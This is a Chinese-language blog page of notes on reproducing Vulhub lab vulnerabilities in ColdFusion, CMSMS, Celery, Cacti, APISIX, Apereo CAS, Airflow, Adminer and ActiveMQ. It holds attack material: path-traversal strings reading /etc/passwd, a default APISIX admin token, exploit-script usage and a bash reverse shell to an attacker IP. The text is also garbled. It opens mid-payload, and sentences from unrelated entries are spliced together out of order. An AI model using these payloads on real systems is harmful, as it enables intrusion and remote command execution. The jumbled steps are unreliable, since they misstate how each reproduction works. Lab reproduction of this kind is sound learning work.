shierbai的博客

locale=../../../../../../../../../../etc/passwd%00en`，即可读取文件`/etc/passwd`locale=../../../../../../../lib/password.properties%00en`搭建环境后，访问`http://your-ip:8500/CFIDE/administrator/enter.cfm`，可以看到初始化页面，输入密码`admin`，开始初始化整个环境。

因此，如果CMSMS版本低于2.2.9.1，未授权的攻击者可以结合[CVE-2019-9053](https://github.com/vulhub/vulhub/tree/master/cmsms/CVE-2019-9053)和CVE-2021-26120漏洞，在服务器上执行任意代码。根据页面中的安装向导来进行，其中MySQL数据库的地址是`db`，数据库名是`cmsms`，账号和密码均为`root`搭建环境访问`http://your-ip/install.php`并安装cms服务。

结合后台的 SSTI 漏洞（[CVE-2021-26120](https://github.com/vulhub/vulhub/tree/master/cmsms/CVE-2021-26120)），攻击者可在目标服务器上执行任意代码。安装过程请根据页面中的安装向导来进行，其中MySQL数据库的地址是`db`，数据库名是`cmsms`，账号和密码均为`root`。使用中的脚本来利用SQL注入漏洞。

在Celery < 4.0版本默认使用Pickle进行任务消息的序列化传递，当所用队列服务（比如Redis、RabbitMQ、RocketMQ等等等）存在未授权访问问题时，可利用Pickle反序列化漏洞执行任意代码。Celery 是一个简单、灵活且可靠的分布式系统，用于处理大量消息，同时为操作提供维护此类系统所需的工具。它是一个专注于实时处理的任务队列，同时也支持任务调度。漏洞利用脚本`exploit.py`仅支持在python3下使用。这里poc已经设置6379端口，使用时直接打靶机ip就行。

在其1.2.17-1.2.22版本中存在一处命令注入漏洞，攻击者可以通过X-Forwarded-For请求头绕过服务端校验并在其中执行任意命令。这个漏洞的利用需要Cacti应用中至少存在一个类似是`POLLER_ACTION_SCRIPT_PHP`的采集器。环境启动后，访问`http://your-ip:8080`会跳转到登录页面。使用admin/admin作为账号密码登录，并根据页面中的提示进行初始化。实际上初始化的过程就是不断点击“下一步”，直到安装成功。其中``包裹的内容会被作为命令执行。

服务启动后，有两个页面`http://your-ip:8080/victim.cgi`和`http://your-ip:8080/safe.cgi`。其中safe.cgi是最新版bash生成的页面，victim.cgi是bash4.3生成的页面。将payload附在User-Agent中访问victim.cgi。safe.cgi则不行。然后构造payload。

因为rpc通信需要使用json或者xml，不太方便，所以我们可以借助第三方UI来和目标通信，如 http://binux.github.io/yaaw/demo/。6800是aria2的rpc服务的默认端口，环境启动后，访问`http://your-ip:6800/`，发现服务已启动并且返回404或空白页面。打开yaaw，点击配置setting按钮，填入运行aria2的目标域名：`http://your-ip:6800/jsonrpc`注意此处只是为了真实环境区别，我这里靶机和攻撃机是同一台。

其7.0.3之前的版本中，对于digest和form两种认证方式，如果用户传入的密码为`null`（也就是没有传递密码参数），appweb将因为一个逻辑错误导致直接认证成功，并返回session。- digest 改进版HTTP基础认证，认证成功后将使用Cookie来保存状态，而不用再传递Authorization头。利用该漏洞需要知道一个已存在的用户名，当前环境下用户名为`admin`。访问`http://your-ip:8080`，可见需要输入账号密码。到重放器会看到session。

Apache APISIX Dashboard 2.10.1版本前存在两个API`/apisix/admin/migrate/export`和`/apisix/admin/migrate/import`，他们没有经过`droplet`框架的权限验证，导致未授权的攻击者可以导出、导入当前网关的所有配置项，包括路由、服务、脚本等。然后访问`http://your-ip:9000/`即可看到Apache APISIX Dashboard的登录页面。进去ggdG清除内容复制进来。

Apache APISIX是一个高性能API网关。在用户未指定管理员Token或使用了默认配置文件的情况下，Apache APISIX将使用默认的管理员Token `edd1c9f034335f136f87ad84b625c8f1`，攻击者利用这个Token可以访问到管理员接口，进而通过`script`参数来插入任意LUA脚本并执行。环境启动后，访问`http://your-ip:9080`即可查看到默认的404页面。利用默认Token增加一个恶意的router，其中包含恶意LUA脚本。

Apereo CAS是一款Apereo发布的集中认证服务平台，常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题，利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞，进而执行任意命令。然后我们登录CAS并抓包，将Body中的`execution`值替换成上面生成的Payload发送。访问`http://your-ip:8080/cas/login`即可查看到登录页面。漏洞原理实际上是Webflow中使用了默认密钥`changeit`如果报错试试换java版本。

Apache Druid是一个开源的分布式数据存储。Apache Druid包括执行嵌入在各种类型请求中的用户提供的JavaScript代码的能力。这个功能是为了在可信环境下使用，并且默认是禁用的。然而，在Druid 0.20.0及以前的版本中，攻击者可以通过发送一个恶意请求使Druid用内置引擎执行任意JavaScript代码，而不管服务器配置如何，这将导致代码和命令执行漏洞。

Apache Airflow是一款开源的，分布式任务调度框架。默认情况下，Apache Airflow无需用户认证，但管理员也可以通过指定`webserver.authenticate=True`来开启认证。

通过未授权访问，攻击者可以下发自带的任务`airflow.executors.celery_executor.execute_command`来执行任意命令，参数为命令执行中所需要的数组。我们可以使用[exploit_airflow_celery.py](exploit_airflow_celery.py)这个小脚本来执行命令touch /tmp/airflow_celery_success。python exploit_airflow_celery.py [靶机ip]执行成功会创建一个这样的文件。

命令注入漏洞哇真有点卡。

1.使用[mysql-fake-server]启动一个恶意的MySQL服务器。在Adminer登录页面中填写恶意服务地址和用户名`fileread_/etc/passwd。在adminer出输入恶意ip和用户名，这个脚本是根据输入用户名来返回读取文件的，如果你输win那就是读取/windows。注意，python版本需要在3.4-3.6之间，否则需要对脚本进行修改。文件会读取到fileOutput文件夹下。我是win10,64位。

如图在物理机（不属于上述任何一个ip）输入要访问的主机及其端口（这里这个ip就是在环境中属于内网我们无法直接访问到的那个服务器，而通过ssrf可以让我们伪造另一个服务端去发送请求来返回我们想要的数据），可以看到在139端显示这个请求是由138发出的，而不是自己的ip，这样就完成了ssrf，不过在利用上博主还不太能够善用。adminer版本是4.7.8，是php编写的数据库管理工具，存在漏洞CVE-2021-21311，它是 Adminer 版本 4.0.0 中的服务器端请求伪造,到 4.7.9。

Apache ActiveMQ是一个开源的、功能强大的消息代理（Message Broker），由 Apache Software Foundation 所提供。ActiveMQ 支持 Java Message Service（JMS）1.1 和 2.0规范，提供了一个高性能、简单、灵活和支持多种语言（Java, C, C++, Ruby, Python, Perl等）的消息队列系统。OpenWire协议在ActiveMQ中被用于多语言客户端与服务端通信。

访问即需要输入密码，进去是在index.html页面，这里切换到admin查看版本5.17.3ActiveMQ中，经过身份验证的攻击者可利用该漏洞，通过Jolokia服务发送特制的HTTP请求写入恶意文件，进而实现远程代码执行。

本漏洞出现在fileserver应用中，漏洞原理其实非常简单，就是fileserver支持写入文件（但不解析jsp），同时支持移动文件（MOVE请求）。：ActiveMQ的web控制台分三个应用，admin、api和fileserver，其中admin是管理员页面，api是接口，fileserver是储存文件的接口；还是不行，因为我是本地复现，不存在需要vps啥的，这里怀疑是因为环境问题，也许是jdk的版本不支持啥的，之前复现log4j2的时候也遇到过这里就不再赘述了。2.文件操作容易出现漏洞。

使用[jmet](https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar)进行漏洞利用。影响版本：Apache ActiveMQ 5.13.0之前5.x版本，https://www.cvedetails.com/cve/CVE-2015-5254/实际环境下，需要诱导管理员点击我们构造的url去做访问，触发反弹条件。bash -i>/dev/tcp/攻击机ip/1234（监听端口） 0>&1。